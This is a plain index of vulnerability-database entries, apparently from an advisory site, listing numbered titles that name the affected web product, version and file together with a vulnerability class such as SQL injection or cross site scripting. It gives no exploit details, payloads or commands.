[45009] Smolinari Mini Web Calendar 1.2 php/cal_pdf.php directory traversal
[45008] Smolinari Mini Web Calendar 1.2 php/cal_default.php cross site scripting
[44950] myWebland Bloggie Lite 0.0.2 genscode.php sql injection
[44872] Comingchina U-Mail Webmail server 4.91 privilege escalation
[44826] Sun Java Web Start privilege escalation
[44777] Arihiro Kurta Kantan WEB Server up to 1.8 directory traversal
[44668] PhpWebGallery 1.3.4 init.inc.php directory traversal
[44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability
[44650] IBM WebSphere Application Server up to 6.0.1.10 Web Services Security weak authentication
[44649] IBM WebSphere Application Server up to 6.0.1 denial of service
[44645] WebBiscuits Events Calendar 1.1 privilege escalation
[44638] Deeserver Ultimate Webboard 3.00 webboard.php sql injection
[44617] PhpWebGallery up to 1.7.2 privilege escalation
[44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal
[44559] PhpWebGallery 1.3.4 cross site scripting
[44520] Oracle WebLogic Workshop 8.1 unknown vulnerability
[44466] Sun Java System Web Proxy Server up to 4.0.1 memory corruption
[44411] PHP Web Explorer Php Web Explorer Lite up to 0.99b main.php directory traversal
[44285] ParsaGostar ParsaWeb CMS default.aspx sql injection
[44268] WebPortal CMS 0.6 Beta/0.6.0/0.7.3/0.7.4 download.php sql injection
[44102] living-e webEdition CMS sql injection
[44066] IBM WebSphere Application Server up to 6.1.0.10 information disclosure
[43771] Turnkeywebtools PHP Live Helper up to 2.0 globalsoff.php privilege escalation
[43770] Turnkeywebtools PHP Live Helper up to 2.0 libsecure.php privilege escalation
[43769] Turnkeywebtools PHP Live Helper up to 2.0 onlinestatus_html.php get sql injection
[43702] Sun Java System Web Proxy Server up to 4.0.1 File Descriptors denial of service
[43667] Horde Groupware Webmail Edition up to 1.0 cross site scripting
[43644] Psychdaily Php Ring Webring System 0.9.1 privilege escalation
[43600] Cisco WebEx Meeting Manager up to 20.2008.2601.4927 ActiveX Control atucfobj.dll memory corruption
[43566] Novell Groupwise 7.0/7.0.2/7.0.3 WebAccess cross site scripting
[43532] PhpWebGallery 1.7.0/1.7.1 information disclosure
[43531] Red Hat JBoss Web Framework Kit 2.5.0 Logging org.jboss.seam.web.AuthenticationFilter privilege escalation
[43525] Webmin/Usermin 1.590 privilege escalation
[43517] IBM WebSphere Portal up to 5.1.0.4 privilege escalation
[43481] Sun Java System Web Server Plugin 7.0 weak authentication
[43449] Webwizguide Web Wiz Forum 9.5 log_off_user.asp cross site request forgery
[43448] Webwizguide Web Wiz Forum 9.5 admin_group_details.asp cross site scripting
[43443] Linuxwebshop php Help Agent 1.0 directory traversal
[43329] BEA WebLogic Server up to 5.1 mod_wl .jsp memory corruption
[43327] Ln-lab WebProxy up to 1.7.8 cross site scripting
[43310] IBM WebSphere Application Server up to 5.1.1.4 weak encryption
[43309] IBM WebSphere Application Server up to 5.1.1.4 privilege escalation
[43178] WebBlizzard Content Management System index.php sql injection
[43117] Com Brightweblinks on Joomla sql injection
[43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web Access cross site scripting
[43054] VanGogh Web CMS 0.9 get_article.php sql injection
[42972] PHP JOBWEBSITE PRO Search Module jobsearch3.php sql injection
[42961] AWBS Advanced Webhost Billing System up to 2.5 news.php sql injection
[42933] Webdevindo-CMS 1.0.0 webd index.php sql injection
[42915] Aj Square AJ Auction Web 2.0 category.php sql injection
[42890] K5n WebCalendar 1.0.4 send_reminders.php privilege escalation
[42886] Fullrevolution Aspwebcalendar2008 File Upload calendar_admin.asp privilege escalation
[42874] Xerox WorkCentre M123/M128/M133 Embedded Web Server cross site scripting
[42873] Xerox WorkCentre 7655/7665/7675 Web Services privilege escalation
[42866] Nitropowered NiTrO Web Gallery up to 1.4.3 albums.php sql injection
[42712] Cisco Linksys Wrh54g Router 1.01.03 Management Interface privilege escalation
[42657] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security denial of service
[42613] Sun Java System Web Server cross site scripting
[42593] Apple Mac OS X up to 10.4.10 Embedded Web Server directory traversal
[42517] SAP Web Application Server cross site scripting
[42505] How2ASP Webboard 4.1 showqanswer.asp sql injection
[42498] IBM Lotus Domino Web Server Web Container cross site scripting
[42464] WebManager-Pro CMS WebManager-Pro index.php sql injection
[42385] IBM WebSphere Application Server 5.0.2 unknown vulnerability
[42358] Miniweb2 Blog Writer 2.0 index.php sql injection
[42323] Sun Java System Web Server up to 6.0 Search Module index.jsp cross site scripting
[42303] cPanel up to 11.22.2 WHM Interface cross site request forgery
[42302] cPanel up to 11.22.2 WHM Interface cross site scripting
[42282] Sun Java System Web Server information disclosure
[42263] Mozilla Bugzilla 3.1.3 RPC Interface privilege escalation
[42134] Php Resource Voice Of Web AllMyGuests 0.4.1 index.php sql injection
[42127] Webcalendar Web Calendar Pro up to 4.0 one_day.php sql injection
[42123] Akiva WebBoard 8.0 cross site scripting
[42052] Terong Advanced Web Photo Gallery 1.0 index.php sql injection
[41966] Drupal Webform Module up to 6.x-1.0 cross site scripting
[41891] Terong Advanced Web Photo Gallery 1.0 MySQL Database weak encryption
[41668] webSPELL 4.1.2 index.php cross site scripting
[41448] Microsoft Office 2000/Xp Office Web Components privilege escalation
[41445] Sun Java Web Console 3.0.3 Access Restriction unknown vulnerability
[41442] Silver-forge Neptune Web Server 3.0 Error Page cross site scripting
[41339] Php Web Scripts Dynamic Photo Gallery 1.0.2 album.php sql injection
[41300] Rising Antivirus International Rising Web Scan Object 18.0.7 ActiveX Control ol2005.dll unknown vulnerability
[41272] Portail Web Php up to 2.5.1.1 privilege escalation
[41242] Linux Web Shop php User Base 1.3 privilege escalation
[41241] Linux Web Shop php Download Manager 1.1 directory traversal
[41238] PORAR WEBBOARD question.asp sql injection
[41185] BEA WebLogic Server denial of service
[41184] BEA WebLogic Server up to 10.0 cross site scripting
[41183] BEA WebLogic Server up to 10.0 privilege escalation
[41182] BEA WebLogic Server up to 8.1 privilege escalation
[41181] BEA WebLogic Server up to 10.0 Administration Console cross site scripting
[41180] BEA WebLogic Server up to 9.1 Access Restriction privilege escalation
[41179] BEA WebLogic Server up to 10.0 Access Restriction privilege escalation
[41178] BEA WebLogic Portal up to 10.0 Access Restriction privilege escalation
[41177] BEA WebLogic Server up to 10.0 weak authentication
[41170] PHP-Nuke Web Links Module Web_Links modules.php sql injection
[41161] BEA WebLogic Portal up to 10.0 Administration Console privilege escalation
[41160] BEA WebLogic Workshop up to 8.1 UI Framework cross site scripting
[41159] BEA WebLogic Portal up to 10.0 cross site scripting
[41157] BEA WebLogic Workshop 8.1 cross site scripting
[41156] BEA WebLogic Portal up to 8.1 privilege escalation
[41155] BEA WebLogic Portal up to 8.1 Access Restriction privilege escalation
[41154] BEA WebLogic Server 9.1 information disclosure
[41012] IBM WebSphere Application Server up to 6.0.2.23 privilege escalation
[40962] Webmin 1.3/1.32/1.370/1.390 Search Box webmin_search.cgi cross site scripting
[40959] IBM WebSphere Edge Server up to 5.1.1 cross site scripting
[40890] Portail Web Php 2.5.1.1 privilege escalation
[40836] webSPELL 4.01.02 cross site request forgery
[40835] webSPELL 4.01.02 index.php cross site scripting
[40790] WebCalendar 1.1.6 User Authentication pref.php cross site scripting
[40746] Web Wiz Forums 9.07 rte_file_browser.asp directory traversal
[40701] Foojan PHP Weblog 1.0 index.php sql injection
[40669] IBM WebSphere Business Modeler up to 6.0.x Access Restriction privilege escalation
[40602] MiniWeb HTTP Server 0.8.19 http.c mwgetlocalfilename directory traversal
[40601] MiniWeb HTTP Server 0.8.19 http.c _mwprocessreadsocket memory corruption
[40586] Menalto Gallery Webcam Module up to 2.2.2 cross site scripting
[40532] Drupal BUEditor 4.7.x-1.0/5.x-1.0 Interfaces cross site request forgery
[40479] PHP Webquest 2.6 soporte_horizontal_w.php sql injection
[40477] IBM WebSphere Application Server up to 6.1.0.2 Administrative Console information disclosure
[40411] WebPortal WebPortal CMS 0.6_beta actions.php sql injection
[40410] WebPortal WebPortal CMS 0.6_beta actions.php privilege escalation
[40375] WebPortal WebPortal CMS up to 0.6.0 index.php sql injection
[40355] phpWebSite 1.4.0 Search Module index.php cross site scripting
[40280] Sun Java System Web Proxy Server up to 3.5 cross site scripting
[40279] Sun Java System Web Proxy Server up to 3.5 cross site scripting
[40278] Sun Java System Web Proxy Server up to 3.5 cross site scripting
[40277] Sun Java System Web Proxy Server up to 4.0.5 cross site scripting
[40233] IBM Domino Web Access 7.0.1 inotes6.dll installbrowserhelperdll memory corruption
[40213] Trend Micro ServerProtect 5.58 Security Patch 3 RPC Interface spntsvc.exe privilege escalation
[40193] Kvaliitti Webdoc Cms 3.0 webd categories.asp sql injection
[40147] Raiden Professional Servers raidenhttpd 2.0.19 Admin Function workspace.php webadmin directory traversal
[40068] BEA WebLogic Mobility Server up to 3.6 weak authentication
[40008] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 directory traversal
[40007] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 cross site scripting
[40006] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 memory corruption
[40005] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 privilege escalation
[40000] webSPELL 4.1.2 index.php cross site scripting
[39861] Proverbs Proverbs Web Calendar up to 1.1 caladmin.inc.php sql injection
[39770] IBM WebSphere MQ 6.0 denial of service
[39739] Webex Communications Webex Gpccontainer Activex Control ActiveX Control denial of service
[39608] Cisco Unified MeetingPlace up to 4.3.0.246 mpweb/scripts/mpx.dll cross site scripting
[39555] Hitachi Groupmax Collaboration Portal up to 07_32_c Web Client information disclosure
[39542] IBM WebSphere Application Server up to 6.1.0.11 uddigui/navigateTree.do cross site request forgery
[39541] IBM WebSphere Application Server up to 6.1.0.11 uddigui/navigateTree.do cross site scripting
[39506] Agtc Websolutions Php-agtc Membership System 1.1a adduser.php weak authentication
[39420] Litespeed Technologies LiteSpeed Web Server up to 3.2.2 php%00.txt information disclosure
[39288] Artmedic Webdesign Artmedic CMS up to 3.4 index.php directory traversal
[39235] CA BrightStor ARCServe BackUp up to 11.1 RPC Interface mediasvr.exe memory corruption
[39209] webmaster-tips.net Flash RSS Reader 1.0 on Joomla admin.wmtrssreader.php privilege escalation
[39166] webmaster-tips.net Flash Image Gallery 1.0 on Joomla admin.wmtgallery.php privilege escalation
[39112] Webhost Automation Helm Web Hosting Control Panel 3.2.16 domain.asp cross site request forgery
[38944] Webmin 1.360 privilege escalation
[38915] Mozilla Bugzilla 3.0.0/3.0.1/3.1.0/3.1.1 WebService offer_account_by_email privilege escalation
[38883] PhpWebGallery 1.7.0 picture.php cross site scripting
[38854] TinyWebGallery 1.6.3.4 index.php cross site scripting
[38810] PHP Webquest up to 2.5 soporte_derecha_w.php sql injection
[38805] Boa Boa Webserver 0.93.15 Stored privilege escalation
[38783] Wordpress up to 2.2.2 RPC Interface sql injection
[38755] IBM WebSphere Application Server up to 6.1.0.8 unknown vulnerability
[38692] ER Mapper Image Web Server Ecw Jpeg 2000 Plug-in up to 7 View ActiveX Control ncsview.dll memory corruption
[38649] Weblogicnet es_desp.php privilege escalation
[38587] BEA WebLogic Server up to 6.1 denial of service
[38586] BEA WebLogic Server up to 8.1 denial of service
[38585] BEA WebLogic Server up to 10.0 information disclosure
[38584] BEA WebLogic Server up to 8.1 unknown vulnerability
[38583] BEA WebLogic Server 9.1 privilege escalation
[38582] BEA WebLogic Server up to 8.1 weak encryption
[38535] Novell Groupwise Webaccess 6.5 WebAccess cross site scripting
[38515] Mozilla Bugzilla up to 3.0.0 WebService privilege escalation
[38301] Zyxel Zywall 2 3.62(wk.6) Management Interface cross site request forgery
[38300] Zyxel Zywall 2 3.62(wk.6) Management Interface cross site scripting
[38299] Zyxel Zywall 2 3.62(wk.6) Management Interface Forms/General_1 cross site request forgery
[38298] Zyxel Zywall 2 3.62(wk.6) Management Interface weak authentication
[38216] Hitachi Groupmax Collaboration Web Client up to 07-32_a information disclosure
[38195] WikiWebWeaver 1.1 File Upload index.php unknown vulnerability
[38175] Sun Java System Web Server obj.conf application unknown vulnerability
[38119] Advanced Webhost Billing System up to 2.5.0 unknown vulnerability
[38118] Advanced Webhost Billing System up to 2.5.0 cross site scripting
[38080] Tincan Webbler CMS up to 3.1.3 unknown vulnerability
[38079] Tincan Webbler CMS up to 3.1.3 Installation index.php information disclosure
[38078] Tincan Webbler CMS up to 3.1.3 uploader/index.php cross site scripting
[38029] Webspell 4.01.02 index.php directory traversal
[37964] IBM WebSphere Application Server up to 6.0.2.18 unknown vulnerability
[37773] Sun Java System Web Server up to 7.0 privilege escalation
[37681] vtiger CRM 5.0.2 WebService unknown vulnerability
[37636] Webixir Efendy Blog 1.0 ara.asp cross site scripting
[37610] Daniel Toma WebChat 0.78 Login login.php sql injection
[37492] web-app.org WebAPP 0.9.9.6 instantmessage.pl moveim unknown vulnerability
[37491] web-app.org WebAPP 0.9.9.6 instantmessage.pl imview3 unknown vulnerability
[37490] web-app.org WebAPP 0.9.9.6 Printing cgi-bin/cgi-lib/subs.pl getcgi unknown vulnerability
[37489] web-app.org WebAPP 0.9.9.6 Capabilities unknown vulnerability
[37488] web-app.org WebAPP 0.9.9.6 cgi-bin/cgi-lib/subs.pl loaduser unknown vulnerability
[37487] web-app.org WebAPP 0.9.9.6 cgi-bin/cgi-lib/user.pl editprofile3 unknown vulnerability
[37486] web-app.org WebAPP 0.9.9.6 forum_display.pl displaypost unknown vulnerability
[37485] web-app.org WebAPP 0.9.9.6 search.pl show_recent_searches cross site scripting
[37484] web-app.org WebAPP 0.9.9.3.3/0.9.9.3.4/0.9.9.6/2007 Administration cross site request forgery
[37458] Key Focus KF Web Server 3.1.0 cross site scripting
[37441] Apple Mac OS X up to 10.4.8 WebCore setRequestHeader cross site scripting
[37439] Apple Mac OS X up to 10.4.8 WebKit memory corruption
[37334] IBM WebSphere Application Server up to 6.1.0.7 cross site scripting
[37331] IBM WebSphere Portal 1.0 content.php sql injection
[37330] IBM WebSphere Portal 1.0 Error Message content.php information disclosure
[37323] Sun Solaris 10.0 Interfaces denial of service
[37302] Singapore Image Gallery Web Application Error Message index.php information disclosure
[37223] MiniWeb Http Server 0.8.1 http.c denial of service
[37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service
[37152] Comdev Web Blogger 4.1 sampleblogger.php privilege escalation
[37138] BDigital Web Solutions WebStudio CMS index.php cross site scripting
[37134] IBM Lotus Domino Web Server up to 7.0.1 denial of service
[37108] Hitachi Groupmax Collaboration Web Client File Sharing cross site scripting
[37103] Mbedthis AppWeb HTTP Server 2.0.5-4 Logging mprlogtofile::logevent denial of service
[37102] Mbedthis AppWeb HTTP Server up to 2.2.1 Trace information disclosure
[37090] IBM AIX 5.2.0/5.3 WebSM unknown vulnerability
[36989] GForge 4.5.16 cvsweb.php privilege escalation
[36988] Sun Java System Web Proxy Server up to 4.0.4 SOCKS Proxy memory corruption
[36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
[36826] BEA WebLogic Workshop up to 9.2 Console directory traversal
[36825] BEA WebLogic Server up to 9.0 denial of service
[36824] BEA WebLogic Portal 9.2 unknown vulnerability
[36823] BEA WebLogic Portal 9.2 Rich Text Editor cross site scripting
[36822] BEA WebLogic Server up to 7.0 unknown vulnerability
[36821] BEA WebLogic Server 9.0 Configuration File information disclosure
[36820] BEA WebLogic Server 9.0 Administration Console unknown vulnerability
[36819] BEA WebLogic Server 9.0 Administration Console weak encryption
[36818] BEA WebLogic Server up to 7.0 denial of service
[36817] BEA WebLogic Server up to 6.1 unknown vulnerability
[36816] BEA WebLogic Server up to 6.1 unknown vulnerability
[36815] BEA WebLogic Server up to 6.1 cross site scripting
[36806] Canon Network Camera Server VB100 up to 3.0 Management Interface cross site scripting
[36794] webdesproxy 0.0.1 webdesproxy.c process_connection_request memory corruption
[36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting
[36531] Pi3Web Web Server 2.0.3 denial of service
[36510] WebSPELL 4.01.02 picture.php directory traversal
[36509] WebSPELL 4.01.02 picture.php unknown vulnerability
[36481] IBM WebSphere Application Server up to 5.1.1.13 unknown vulnerability
[36467] InterVations NaviCOPA Web Server 2.01 denial of service
[36429] Digium Asterisk up to 1.4.2 Manager Interface manager.conf denial of service
[36409] Advanced Webhost Billing System cart2.php privilege escalation
[36403] Progress Webspeed Messenger wsisa.dll unknown vulnerability
[36341] PHP-Ring Webring System 0.9 index.php sql injection
[36097] Guernion Sylvain Portail Web Php index.php privilege escalation
[36089] WebBlizzard Content Management System weak authentication
[36085] IBM WebSphere Application Server up to 6.1.0.6 denial of service
[36082] IBM Lotus Notes up to 6.5.5 Domino Web Access cross site scripting
[36000] Webasyst_llc smarty privilege escalation
[35977] web-app.org WebAPP 0.9.9.5 unknown vulnerability
[35976] web-app.org WebAPP up to 0.9.9.5 unknown vulnerability
[35975] web-app.org WebAPP 0.9.9.6 cross site scripting
[35973] web-app.org WebAPP up to 0.9.9.5 cross site scripting
[35972] web-app.org WebAPP up to 0.9.9.5 memory corruption
[35932] Kaqoo Auction Software Interfaces support.inc.php privilege escalation
[35928] Hitachi Cosminexus Collaboration Portal Web Client sql injection
[35887] InterVations Navicopa Web Server 2.01 cgi-bin memory corruption
[35864] Active Web Softwares Active Auction House 7.1 default.asp sql injection
[35807] Active Web Softwares Active Photo Gallery 6.2 default.asp sql injection
[35800] WordPress up to 2.1.3 Rc1 Administration Interface cross site scripting
[35723] Webwizguide Web Wiz Forums up to 8.x Filters functions_filters.asp formatSQLInput sql injection
[35699] Sun Java System Web Server up to 6.0 Authorization unknown vulnerability
[35672] IBM WebSphere Application Server up to 5.1.1.9 information disclosure
[35671] IBM WebSphere Application Server up to 5.0 information disclosure
[35670] IBM WebSphere Application Server up to 5.0.1 information disclosure
[35651] web-app.org WebAPP 0.9.9.4/0.9.9.5/0.9.9.6 cross site request forgery
[35650] Sun Java System Web Server unknown vulnerability
[35645] K5n WebCalendar 0.9.45 Login login.php privilege escalation
[35511] WebCalendar 1.0.0/1.0.1/1.0.2/1.0.3/1.0.4 privilege escalation
[35406] Webmin up to 1.3.20 chooser.cgi cross site request forgery
[35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
[35390] Web-app.org WebAPP up to 0.9.9.5 unknown vulnerability
[35340] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability
[35339] Web-app.org WebAPP up to 0.9.9.4 information disclosure
[35338] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability
[35337] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability
[35336] Web-app.org WebAPP up to 0.9.9.4 Default Configuration
[35335] Web-app.org WebAPP 0.9.9.4 weak authentication
[35334] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability
[35333] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability
[35332] Web-app.org WebAPP 0.9.9.4 cross site request forgery
[35331] Web-app.org WebAPP 0.9.9.4 Profiles unknown vulnerability
[35330] Web-app.org WebAPP 0.9.9.4 Administration Administrative unknown vulnerability
[35329] Web-app.org WebAPP up to 0.9.9.4 cross site scripting
[35328] Web-app.org WebAPP 0.9.9.4 Log Viewer cross site scripting
[35327] Web-app.org WebAPP 0.9.9.4 cross site scripting
[35326] Web-app.org WebAPP 0.9.9.4 cross site scripting
[35317] webSPELL 4.0/4.01.00/4.01.01/4.01.02 printview.php sql injection
[35314] webSPELL 4.0 weak authentication
[35309] webSPELL File Upload privilege escalation
[35308] webSPELL sql injection
[35223] Phpwebgallery 1.6.1 register.php cross site scripting
[35096] webSPELL 4.01.02 news.php sql injection
[35014] Nickolas Grigoriadis Mini Web server 0.0.6 directory traversal
[34986] cPanel WebHost Manager up to 11.0.0 cross site scripting
[34960] Plain Old Webserver up to 0.0.8 directory traversal
[34925] cPanel WebHost Manager privilege escalation
[34820] Portail Web Php 2.5.1.1 index.php directory traversal
[34819] Portail Web Php up to 2.5.1.0 includes/includes.php privilege escalation
[34778] Intel Server Board Sc5400ra Intelligent Platform Management Interface denial of service
[34702] SpoonLabs Vivvo Article Management CMS 3.40 rss/show_webfeed.php sql injection
[34640] Grigoriadis Mini Web server up to 0.4 memory corruption
[34619] webSPELL 4.01.02 gallery.php sql injection
[34610] webSPELL 4.01.02 gallery.php sql injection
[34603] Webchat.org WebChat 0.77 defines.php privilege escalation
[34573] BEA WebLogic Portal 9.2 unknown vulnerability
[34571] BEA WebLogic Server denial of service
[34569] BEA WebLogic Server 9.0 denial of service
[34568] BEA WebLogic Server up to 6.1 denial of service
[34567] BEA WebLogic Server 9.0 information disclosure
[34566] BEA WebLogic Server denial of service
[34565] BEA WebLogic Server up to 7.0 unknown vulnerability
[34564] BEA WebLogic Server up to 7.0 unknown vulnerability
[34563] BEA WebLogic Server 9.0 unknown vulnerability
[34562] BEA WebLogic Server up to 8.1 Access Restriction unknown vulnerability
[34561] BEA WebLogic Server up to 6.1 denial of service
[34559] BEA WebLogic Server up to 6.1 unknown vulnerability
[34558] BEA WebLogic Server up to 8.1 unknown vulnerability
[34557] BEA WebLogic Server up to 7.0 Thread Management denial of service
[34445] Oracle E-Business Suite 11.5.10cu2 Web Applications Desktop Integrator unknown vulnerability
[34419] Pensacola Web Designs Xtremeasp Photogallery 2.0 displaypic.asp sql injection
[34418] Pensacola Web Designs Xtremeasp Photogallery 2.0 displaypic.asp cross site scripting
[34356] magic photo storage website admin_password.php privilege escalation
[34341] Scriptaty magic photo storage website privilege escalation
[34259] Cms-center Simple Web Cms page.php sql injection
[34173] Zen Cart Web Shopping Cart up to 1.3.6 cross site scripting
[34160] AIDeX Mini-WebServer 1.1 Rc3 denial of service
[34158] Mozilla Durian Web Application Server 3.02 memory corruption
[34122] Microsoft Office Web Components 2000 privilege escalation
[34113] Novell GroupWise 5.57e/6.5.7/7.0/7.0.0 WebAccess user.html cross site scripting
[34043] Http explorer Http Explorer Web Server 1.02 directory traversal
[33959] WebCalendar 1.0.4 export_handler.php cross site scripting
[33866] Microsoft IIS 5.1 Web Directory com privilege escalation
[33838] cPanel WebHost Manager 3.1.0 cross site scripting
[33827] IBM WebSphere Host On-Demand 6.0 unknown vulnerability
[33738] Xerox WorkCentre 12/13/14 Web Services information disclosure
[33735] Xerox WorkCentre 12.060.17.000/13.060.17.000/14.060.17.000 User Interface privilege escalation
[33536] cPanel WebHost Manager 3.1.0 cross site scripting
[33509] Apple Mac OS X up to 10.3.x WebKit memory corruption
[33464] IBM WebSphere Application Server Eal4 Authentication unknown vulnerability
[33463] IBM WebSphere Application Server unknown vulnerability
[33451] Biba Software SeleniumServer Web Server 1.0 cross site scripting
[33351] SAP SAP Web Application Server up to 6.39 enserver.exe denial of service
[33342] Webhost Automation Helm Web Hosting Control Panel 3.2.10 users.asp cross site scripting
[33321] Web Inhabit A+ Store E-Commerce account_login.asp cross site scripting
[33320] Web Inhabit A+ Store E-Commerce browse.asp sql injection
[33226] Essen Essentia Web Server 2.15 memory corruption
[33181] The Web Drivers Simple Forum message_details.php sql injection
[33166] SAP SAP Web Application Server up to 6.39 enserver.exe denial of service
[33109] EFS Web Server 4.0 NTFS File System ::$data information disclosure
[33108] EFS Web Server 4.0 File Sharing cross site scripting
[33057] Web Wiz Forums 8.04 sql injection
[33020] Webgeneius GOOP Gallery index.php cross site scripting
[33019] MiniHTTP Web Forum File Sharing Sever Powerpack 4.0 User Account join.asp privilege escalation
[32933] Trawler Trawler Web CMS up to 1.8.1 index.php privilege escalation
[32921] Castor PHP Web Builder 1.1.1 lib/rs.php privilege escalation
[32893] Comdev Web Blogger 4.1 adminfoot.php privilege escalation
[32842] WebSPELL 4.0/4.01.01 index.php sql injection
[32781] IBM WebSphere Application Server up to 6.1.0.1 unknown vulnerability
[32704] phpWebSite 0.10.2 init.php privilege escalation
[32647] webGENEius GOOP Gallery 2.0.2 download.php directory traversal
[32640] Joshua Muheim phpMyWebmin 1.0 change_preferences2.php privilege escalation
[32627] PHP Web Scripts Easy Banner Free functions.php privilege escalation
[32591] Joshua Muheim phpMyWebmin 1.0 window.php opendir information disclosure
[32590] Joshua Muheim phpMyWebmin 1.0 window.php privilege escalation
[32580] InterVations NaviCOPA Web Server 2.01 memory corruption
[32540] Jl Webworks QuickBlogger 1.4 acc.php privilege escalation
[32337] Roller WebLogger 2.3 sitesearch.do cross site scripting
[32283] WebSPELL 4.0/4.01.01 squads.php sql injection
[32282] WebSPELL 4.0/4.01.01/4.1/4.1.1 Stored information disclosure
[32265] IBM Lotus Domino Web Access 7.0.1 unknown vulnerability
[32248] Comscripts Web Server Creator 0.1 privilege escalation
[32225] raidenhttpd 1.1.32/1.1.47/1.1.49 WebAdmin privilege escalation
[32178] EFS Easy Address Book Web Server 1.2 denial of service
[32011] PHPBB 2.0.20 Web Proxy usercp_avatar.php privilege escalation
[31921] Sun Java Web Start up to 1.3.0_02 privilege escalation
[31871] WTcom Web Torrent up to 0.2.4 torrents.php sql injection
[31861] Symantec Veritas NetBackup PureDisk Remote Office Edition Management Interface unknown vulnerability
[31857] IBM WebSphere Application Server up to 6.0.2.12 ThreadIdentitySupport unknown vulnerability
[31853] WEBsta CMS 0.3.1 privilege escalation
[31845] WEBsta Mailing List Manager 1.3e install3.php privilege escalation
[31841] WebDynamite ProjectButler 0.8.4 Cache classes privilege escalation
[31837] Soft3304 04WebServer 1.5/1.42/1.81/1.83 User Authentication unknown vulnerability
[31836] Soft3304 04WebServer 1.5/1.42/1.81/1.83 Error Page cross site scripting
[31833] WEBsta CMS 0.3.1 index.php privilege escalation
[31816] TinyWebGallery 1.3/1.4/1.5 image.php privilege escalation
[31796] IBM WebSphere Application Server up to 6.1.0.0 information disclosure
[31790] Webring Component up to 1.0 on Joomla admin.webring.docs.php privilege escalation
[31760] Webligo BlogHoster 2.2 previewcomment.php cross site scripting
[31750] Novell GroupWise WebAccess up to 6.4 Login Page cross site scripting
[31730] Web-scripts Visual Events Calendar 1.1 calendar.php privilege escalation
[31722] Turnkey Web Tools PHP Simple Shop up to 2.0 admin/index.php privilege escalation
[31721] Turnkey Web Tools PHP Live Helper up to 2.0 global.php privilege escalation
[31635] CA eTrust Antivirus WebScan up to 1.1.0.1047 memory corruption
[31634] CA eTrust Antivirus WebScan up to 1.1.0.1047 memory corruption
[31633] CA eTrust Antivirus WebScan memory corruption
[31594] Total Online Solutions Advanced Webhost Billing System 2.2.2 contact.php cross site scripting
[31395] Silentweb listmessenger 0.9.3 listmessenger.php privilege escalation
[31314] Hotwebscripts CMS Mundo 1.0 Search Module index.php sql injection
[31301] Hitachi Groupmax Collaboration Web Client File Sharing cross site scripting
[31297] Drupal 4.6/4.7 Webform Module cross site scripting
[31218] PhpWebGallery up to 1.6 comments.php cross site scripting
[31200] Webex Communications Downloader Java ActiveX Control privilege escalation
[31033] Mambo 4.6 weblinks.php sql injection
[31032] Mambo 4.6 weblinks.php sql injection
[31005] IBM WebSphere Application Server up to 6.0.2.10 UserNameToken Cache unknown vulnerability
[30962] Php Web Scripts Ad Manager Pro 2.6 common.php privilege escalation
[30899] Hotwebscripts CMS Mundo unknown vulnerability
[30898] Hotwebscripts CMS Mundo sql injection
[30856] Webexceluk P.A.I.D 2.2 Input Fields index.php cross site scripting
[30827] Pensacola Web Designs Xtreme ASP Photo Gallery up to 1.05 displaypic.asp cross site scripting
[30785] WebprojectDB 0.1.3 nav.php privilege escalation
[30752] It-direkt Cabacos Web CMS up to 3.8.498 suchergebnisse.asp cross site scripting
[30637] HotWebScripts Weblog Oggi 1.0 hotwebscripts.com cross site scripting
[30624] ASPwebSoft Speedy Asp Discussion Forum profileupdate.asp unknown vulnerability
[30581] WebCalendar 1.0.3 index.php includedir privilege escalation
[30575] Eitsop My Web Server 1.0 denial of service
[30504] Agtc Websolutions PHP-AGTC Membership System up to 1.1a adduser.php cross site scripting
[30501] Hotwebscripts CMS Mundo 1.0 Search Module cross site scripting
[30307] BEA WebLogic Server up to 8.1 information disclosure
[30306] BEA WebLogic Server 9.0 Administration Console unknown vulnerability
[30305] BEA WebLogic Server 9.0 weak encryption
[30304] BEA WebLogic Server 8.1 Administration Console information disclosure
[30303] BEA WebLogic Server 8.1 Administration Console unknown vulnerability
[30302] BEA WebLogic Server 8.1 unknown vulnerability
[30298] BEA WebLogic Server up to 8.0 unknown vulnerability
[30287] IBM WebSphere Application Server 5.0.2 weak encryption
[30286] IBM WebSphere Application Server up to 5.0.2 unknown vulnerability
[30285] IBM WebSphere Application Server 5.1.1 Trace information disclosure
[30284] IBM WebSphere Application Server 5.0.2 unknown vulnerability
[30283] IBM WebSphere Application Server up to 5.0.2 cross site scripting
[30282] IBM WebSphere Application Server up to 5.0.2 weak encryption
[30248] Turnkey Web Tools PHP Live Helper 1.8 chat.php cross site scripting
[30237] Limbo CMS 1.0.4.2 weblinks.html.php sql injection
[30232] Web-Labs Web-Labs CMS cross site scripting
[30103] Northern Solutions Xeneo Web Server 2.2.22.0 privilege escalation
[30102] WebCalendar 1.0.1/1.0.2/1.0.3 Error Message unknown vulnerability
[30084] OpenVPN up to 2.0.7 Management Interface weak encryption
[29994] Blog Mod 0.2.x weblog_posting.php sql injection
[29985] Jmk Web Scripts Jmk Picture Gallery admin_gallery.php3 unknown vulnerability
[29982] SWS Sws Simple Web Server 0.1.7 syslog memory corruption
[29981] SWS Sws Simple Web Server 0.1.7 memory corruption
[29916] PhpWebGallery 1.0/1.4.1/1.5.1 picture.php privilege escalation
[29837] Cisco ASA 9.1.2/9.1.4 WebVPN privilege escalation
[29836] Symantec Web Gateway up to 5.2.1 Report Reflected cross site scripting
[29835] Symantec Web Gateway up to 5.2.1 clientreport.php sql injection
[29834] Symantec Web Gateway up to 5.2.1 User.php sql injection
